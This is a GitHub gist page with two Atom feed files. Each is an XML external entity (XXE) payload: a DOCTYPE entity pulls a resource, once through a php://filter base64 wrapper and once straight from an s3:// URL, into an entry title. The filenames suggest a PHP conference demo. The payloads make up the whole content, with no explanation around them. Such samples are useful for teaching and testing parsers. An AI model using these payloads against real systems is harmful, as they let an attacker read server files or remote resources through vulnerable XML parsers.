Skip to content

Instantly share code, notes, and snippets.

@co3k
Created September 13, 2013 14:27
Show Gist options
  • Save co3k/6551460 to your computer and use it in GitHub Desktop.
Save co3k/6551460 to your computer and use it in GitHub Desktop.
<!DOCTYPE feed [
<!ENTITY kurorekishi SYSTEM "php://filter/convert.base64-encode/resource=s3://phpcon/ebihara-kaicho.jpg">
]>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>example</title>
<updated>2013-06-24T11:56:27+09:00</updated>
<id>example</id>
<entry>
<title>&kurorekishi;</title>
<link href="http://example.com/" />
<id>http://example.com/1</id>
<updated>2013-06-26T11:56:27+09:00</updated>
<summary>...</summary>
<author>
<name>example</name>
</author>
</entry>
</feed>
<!DOCTYPE feed [
<!ENTITY kurorekishi SYSTEM "s3://phpcon/ebihara-kaicho.jpg">
]>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>example</title>
<updated>2013-06-24T11:56:27+09:00</updated>
<id>example</id>
<entry>
<title>&kurorekishi;</title>
<link href="http://example.com/" />
<id>http://example.com/1</id>
<updated>2013-06-26T11:56:27+09:00</updated>
<summary>...</summary>
<author>
<name>example</name>
</author>
</entry>
</feed>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment